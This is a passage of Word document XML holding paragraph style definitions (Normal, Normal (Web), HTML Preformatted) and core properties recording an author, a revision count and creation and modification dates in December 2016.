  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{679352C2-0FF0-47CD-A7EB-3C6F6435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26FE3"/>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26FE3"/>
    <w:pPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00426F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26FE3"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00426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6FE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RAMAN</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>SIVA RAMAN</cp:lastModifiedBy>
  <cp:revision>11</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-12-07T14:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-12-07T16:14:00Z</dcterms:modified>
</cp:coreProperties>
</file>